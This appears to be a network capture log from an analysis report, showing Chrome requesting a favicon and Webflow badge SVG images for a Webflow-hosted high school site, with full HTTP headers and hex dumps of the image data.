                                                  2025-03-28 12:42:42 UTC664OUTGET /img/favicon.ico HTTP/1.1
                                                  Host: cdn.prod.website-files.com
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Sec-Fetch-Storage-Access: active
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:42 UTC645INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:42:42 GMT
                                                  Content-Type: image/x-icon
                                                  Content-Length: 15086
                                                  Connection: close
                                                  x-amz-id-2: QRs3q+dhKhAMTlvzYZ9HsOXkYLhQn66tiVr3vbhVW/V2FbAxceQ9QjMXwPqcyzjtLgD1BjyzKEE=
                                                  x-amz-request-id: BSTN61CAHM9SMTMC
                                                  Last-Modified: Thu, 05 Oct 2023 23:38:20 GMT
                                                  ETag: "1f894f487d068a2ced95d5cd4f88598c"
                                                  x-amz-server-side-encryption: AES256
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  x-amz-version-id: C5TuT6ObkzP1GjuEGkIHJatwDHqj5J6N
                                                  CF-Cache-Status: HIT
                                                  Age: 30871
                                                  Accept-Ranges: bytes
                                                  Access-Control-Allow-Origin: *
                                                  Server: cloudflare
                                                  CF-RAY: 92773581bf388c2f-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:42:42 UTC724INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 32 2b 88 39 32 2b f3 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: 00 %6 % h6(0` $92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                  2025-03-28 12:42:42 UTC1369INData Raw: f8 f8 f8 ff f8 f8 f8 ff f8 f8 f8 ff f7 f7 f7 ff 8e 8a 86 ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 30 29 ff 50 49 43 ff e0 e0 df ff f8 f9 f9 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff f9 f9 f9 ff e2 e1 e0 ff 9a 96 93 ff 4b 44 3e ff 44 3d 36 ff c9 c7 c5 ff f9 fa fa ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff d6 d5 d4 ff 4f 49 42 ff 38 31 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                  Data Ascii: 70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+80)PICKD>D=6OIB81)92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:42 UTC1369INData Raw: f9 f9 ff de dd dc ff 56 50 4a ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 31 2a ff 4b 45 3f ff c0 be bc ff d3 d2 d1 ff d2 d1 d0 ff d2 d1 d0 ff d1 cf ce ff d9 d8 d6 ff f5 f4 f4 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff 9c 99 96 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                  Data Ascii: VPJ70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+81*KE?92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3c 36 2f ff 53 4d 47 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 50 4a 44 ff 3b 34 2d ff 38 31 2a ff 41 3a 33 ff 56 50 4a ff 56 51 4b ff 56 50 4b ff 57 51 4b ff 54 4e 48 ff 3f 38 31 ff 39 32 2a ff 3a 33 2d ff 50 4a 44 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 4f 49 43 ff 3a 33 2c ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+<6/SMGWQKVPKVPKVPKWQKPJD;4-81*A:3VPJVQKVPKWQKTNH?8192*:3-PJDWQKVPKVPKVPKVPKWQKOIC:3,92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                  2025-03-28 12:42:42 UTC1369INData Raw: 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b f3 39 32 2b 89 39 32 2b f4 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:42 UTC1369INData Raw: 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                  Data Ascii: 2+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 3c 35 2e ff 54 4e 48 ff 76 72 6d ff b2 b0 ad ff eb ea ea ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f3 f3 f3 ff f6 f6 f6 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff ef ef ef ff 72 6d 68 ff 36 2f 28 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3f 39 32 ff 68 63 5d ff 6e 69 64 ff 74 6f 6b ff b1 ae ab ff f5 f5 f5 ff f7 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff fa fa fa ff c0 be bc ff 41 3b 34 ff 38 31 2a ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+<5.TNHvrmrmh6/(92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+?92hc]nidtokA;481*92+92+92+92+92+92+92+92+92+92+92+92+9


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.44974513.33.251.2104435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:42 UTC433OUTGET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1
                                                  Host: d3e54v103j8qbb.cloudfront.net
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Sec-Fetch-Storage-Access: active
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:42 UTC579INHTTP/1.1 200 OK
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 421
                                                  Connection: close
                                                  Last-Modified: Thu, 21 Sep 2023 16:04:04 GMT
                                                  X-Amz-Server-Side-Encryption: AES256
                                                  Accept-Ranges: bytes
                                                  Server: AmazonS3
                                                  Date: Fri, 28 Mar 2025 02:50:09 GMT
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  Etag: "89e12c322e66c81213861fc9acb8b003"
                                                  Via: 1.1 2ae108ea5404064fac59010eedcd1806.cloudfront.net (CloudFront)
                                                  Age: 35554
                                                  Access-Control-Allow-Origin: *
                                                  X-Cache: Hit from cloudfront
                                                  X-Amz-Cf-Pop: JFK50-P10
                                                  X-Amz-Cf-Id: BVHSpw23kg1O_LqTk-_o4qnLz5tLH5U2-LdLHXK3Y_yQ-hcqPz2-Nw==
                                                  2025-03-28 12:42:42 UTC421INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 36 20 31 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 35 2e 36 35 20 30 4c 31 37 2e 34 36 35 34 20 31 36 48 39 2e 37 37 37 37 38 4c 31 33 2e 32 30 33 20 39 2e 33 36 38 39 32 48 31 33 2e 30 34 39 33 43 31 30 2e 32 32 33 35 20 31 33 2e 30 33 37 32 20 36 2e 30 30 37 33 38 20 31 35 2e 34 35 32 20 30 20 31 36 56 39 2e 34 36 30 36 38 43 30 20 39 2e 34 36 30 36 38 20 33 2e 38 34 33
                                                  Data Ascii: <svg width="26" height="16" viewBox="0 0 26 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M25.65 0L17.4654 16H9.77778L13.203 9.36892H13.0493C10.2235 13.0372 6.00738 15.452 0 16V9.46068C0 9.46068 3.843


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.44974613.33.251.2104435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:42 UTC433OUTGET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1
                                                  Host: d3e54v103j8qbb.cloudfront.net
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Sec-Fetch-Storage-Access: active
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:42 UTC580INHTTP/1.1 200 OK
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 9912
                                                  Connection: close
                                                  Date: Thu, 27 Mar 2025 20:17:35 GMT
                                                  Last-Modified: Thu, 21 Sep 2023 16:04:31 GMT
                                                  Etag: "c82cec3b78a2b2d267bbfe3c7e838068"
                                                  X-Amz-Server-Side-Encryption: AES256
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  Accept-Ranges: bytes
                                                  Server: AmazonS3
                                                  Via: 1.1 350c00f07ce2a077574ee5c2ad078d3e.cloudfront.net (CloudFront)
                                                  Age: 59108
                                                  Access-Control-Allow-Origin: *
                                                  X-Cache: Hit from cloudfront
                                                  X-Amz-Cf-Pop: JFK50-P10
                                                  X-Amz-Cf-Id: 5iyknVs3Uy3HsiI_F0HPO6-svDE8o-lLI3zfI_RujRnmsSrFwofUfg==
                                                  2025-03-28 12:42:42 UTC9912INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 31 38 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 38 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 30 2e 35 32 35 30 32 34 20 30 2e 38 39 36 34 38 34 48 33 2e 30 35 34 33 32 4c 36 2e 30 30 37 37 36 20 38 2e 32 36 36 32 32 4c 38 2e 38 39 39 30 35 20 30 2e 38 39 36 34 38 34 48 31 31 2e 33 35 33 31 56 31 31 48 39 2e 34 37 33 32 37 56 33 2e 37 39 39 34 39 4c 36 2e 36 36 33 37 20 31 31 48 35 2e 31 38 37 31 33 4c 32 2e 33 38 34 34 20 33 2e 39 32 30 37 37 56 31 31 48 30 2e 35 32 35 30 32 34 56 30 2e 38 39 36 34 38 34 5a 22 20 66 69 6c 6c 3d
                                                  Data Ascii: <svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449747104.18.161.1174435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:43 UTC405OUTGET /img/favicon.ico HTTP/1.1
                                                  Host: cdn.prod.website-files.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Sec-Fetch-Storage-Access: active
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:43 UTC645INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:42:43 GMT
                                                  Content-Type: image/x-icon
                                                  Content-Length: 15086
                                                  Connection: close
                                                  x-amz-id-2: QRs3q+dhKhAMTlvzYZ9HsOXkYLhQn66tiVr3vbhVW/V2FbAxceQ9QjMXwPqcyzjtLgD1BjyzKEE=
                                                  x-amz-request-id: BSTN61CAHM9SMTMC
                                                  Last-Modified: Thu, 05 Oct 2023 23:38:20 GMT
                                                  ETag: "1f894f487d068a2ced95d5cd4f88598c"
                                                  x-amz-server-side-encryption: AES256
                                                  Cache-Control: max-age=84600, must-revalidate
                                                  x-amz-version-id: C5TuT6ObkzP1GjuEGkIHJatwDHqj5J6N
                                                  CF-Cache-Status: HIT
                                                  Age: 30872
                                                  Accept-Ranges: bytes
                                                  Access-Control-Allow-Origin: *
                                                  Server: cloudflare
                                                  CF-RAY: 92773585a8f428c9-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:42:43 UTC724INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 32 2b 88 39 32 2b f3 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: 00 %6 % h6(0` $92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:43 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:43 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
